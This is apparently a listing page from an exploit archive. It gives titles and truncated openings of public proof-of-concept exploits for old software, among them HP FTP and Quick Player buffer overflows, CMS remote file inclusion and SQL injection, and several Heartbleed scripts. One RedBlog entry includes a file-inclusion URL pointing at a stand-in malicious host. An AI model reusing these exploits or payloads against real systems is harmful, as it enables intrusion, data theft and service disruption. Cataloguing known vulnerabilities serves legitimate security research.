Hewlett-Packard FTP Print Server <= 2.4.5 - Buffer Overflow (PoC)

No description provided by source. !/usr/bin/python import sys from ftplib import FTP print Hewlett-Packard FTP Print Server Version 2.4.5 Buffer Overflow POC print Copyright c Joxean Koret print if lensys.argv == 1: print Usage: %s target % sys.argv0 sys.exit0 target = sys.argv1 print + Running...

McNews 1.x Install.PHP Arbitrary File Include Vulnerability

No description provided by source. !/usr/bin/env python coding: utf-8 import re from pocsuite.net import req from pocsuite.poc import Output, POCBase from pocsuite.utils import register class McNewsRemoteFileIncludePOCBase: vulID = '78899' version = '1' vulDate = '2005-03-17' author = ' '...

RedBlog 0.5 Index.PHP Remote File Include Vulnerability

RedBlog 0.5 Index.PHP 远程文件包含漏洞 漏洞类型： 输入验证错误 漏洞危害： 攻击者可以利用该漏洞执行远程php文件，从而攻击RedBlog甚至控制 服务器 exp： http://www.example.com/Path/index.php?rootpath==http://evilscripts? 解决方案： 厂商没有提供补丁，推荐使用加速乐: !/usr/bin/env python coding: utf-8 from pocsuite.net import req from pocsuite.poc import POCBase, Output from...

Quick Player 1.3 Unicode SEH Exploit

No description provided by source. Quick Player 1.3 Unicode SEH Exploit Author Abhishek Lyall and Puneet Jain [email protected] , abhilyallatgmaildotcom, infoataslitsecuritydotcom Web - http://www.aslitsecurity.com/ Blog - http://www.aslitsecurity.blogspot.com/ Download Vulnerable...

Microsoft Internet Explorer 7.0 HTML Denial of Service Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/23178/info Microsoft Internet Explorer is prone to a denial-of-service vulnerability because the application fails to handle exceptional conditions. This issue is triggered when an attacker entices a victim user to visit ...

Honestech VHS to DVD <= 3.0.30 Deluxe Local Buffer Overflow (SEH)

No description provided by source. !/usr/bin/python Exploit Title: Honestech VHS to DVD = 3.0.30 Deluxe Local Buffer Overflow SEH Date: September 16, 2010 Author: Brennon Thomas [email protected] Software Link: n/a Version: = 3.0.30.0 Deluxe Tested on: Windows XP SP2/SP3 using Honestech VHS to...

Microsoft Active Directory LDAP Server Username Enumeration Weakness

No description provided by source. source: http://www.securityfocus.com/bid/32305/info Microsoft Active Directory is prone to a username-enumeration weakness because of a design error in the application when verifying user-supplied input. Attackers may exploit this weakness to discern valid...

NIBE heat pump LFI exploit

No description provided by source. !/usr/bin/python import socket,sys,os,base64 NIBE heat pump LFI exploit Written by Jelmer de Hen Published at http://h.ackack.net/?p=302 Special thanks to Fredrik Nordberg Almroth and Mathias Karlsson for obtaining this information http://h.ackack.net/?p=274 whi...

Wireshark 1.2.5 LWRES getaddrbyname BOF - calc.exe

No description provided by source. !/usr/bin/env python Wireshark 1.2.5 LWRES getaddrbyname stack-based buffer overflow Discovered by babi Reference: http://www.exploit-db.com/exploits/11288 Exploit Dev by Nullthreat & Pure|Hate import socket, sys try: host = sys.argv1 except: print usage: +...

Insky CMS 006-0111 - Multiple Remote File Include Vulnerability

No description provided by source. !/usr/bin/env python coding: utf-8 import re from pocsuite.net import req from pocsuite.poc import Output, POCBase from pocsuite.utils import register class InskyCMSRemoteFileIncludePOCBase: vulID = '68005' version = '1' vulDate = '2006-06-25' author = ' '...

SPIP < 2.0.9 Arbitrary Copy All Passwords to XML File Remote Exploit

No description provided by source. !/usr/bin/env python SPIP - Content Management System 2.0.9 exploit http://www.securityfocus.com/bid/36008 Author : KernelPanik import urllib, urllib2 import cookielib import sys def sendrequesturlOpener, url, postdata=None: request = urllib2.Requesturl url =...

JAKCMS <= 2.01 RC1 - Blind SQL Injection Exploit

No description provided by source. !/usr/bin/python jakCMS = v2.01 RC1 Blind SQL Injection Exploit Understanding: The parameters 'JAKCOOKIENAME' and 'JAKCOOKIEPASS' are parsed via cookies to the application and are unchecked for malicious characters. The contents of these variables are directly...

Firefly Media Server <= 0.2.4 - Remote Denial of Service Exploit

No description provided by source. !C:\python25\python25.exe Advisory : UPH-07-02 mt-dappd/Firefly media server remote DoS Discovered by nnp http://www.unprotectedhex.com import sys import socket import time if lensys.argv != 3: sys.exit-1 killmsg = GET /xml-rpc?method=stats HTTP/1.1\r\n...

Core FTP Server Version 1.2, build 535, 32-bit - Crash Poc

D-Link DIR-652, DIR-835, DIR-855L, DGL-500, and DHP-1565 suffer from clear text storage of passwords, cross site scripting, and sensitive information disclosure vulnerabilities. !/usr/bin/python import socket,sys,time def Usage: print "Core FTP Server Version 1.2, build 535, 32-bit - Crash P.O.C....

enip-info NSE Script

This NSE script is used to send a EtherNet/IP packet to a remote device that has TCP 44818 open. The script will send a Request Identity Packet and once a response is received, it validates that it was a proper response to the command that was sent, and then will parse out the data. Information...

Than imagined more terror! OpenSSL“effort”vulnerability in-depth analysis-vulnerability warning-the black bar safety net

Author: yaoxi original source http://blog.wangzhan.360.cn/ Recently, OpenSSL broke this year's most serious security vulnerability in the hacker community is named“heart bleed”vulnerability. 3 6 0 site Guard security team of the vulnerability analysis, the vulnerability is not only related to htt...

Exploit for Out-of-bounds Read in Openssl

HeartBleed Tester & Exploit --------------------------- NB Ne...

TLS Heartbeat Proof Of Concept

!/usr/bin/env python Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford [email protected] The author disclaims copyright to this source code. Modified by Csaba Fitzl for multiple SSL / TLS version support import sys import struct import socket import time import select import ...

Heartbleed Proof Of Concept

!/usr/bin/python Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford [email protected] The author disclaims copyright to this source code. import sys import struct import socket import time import select import re from optparse import OptionParser options =...

OpenSSL TLS Heartbeat Extension - &#039;Heartbleed&#039; Memory Disclosure

!/usr/bin/python Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford [email protected] The author disclaims copyright to this source code. import sys import struct import socket import time import select import re from optparse import OptionParser options =...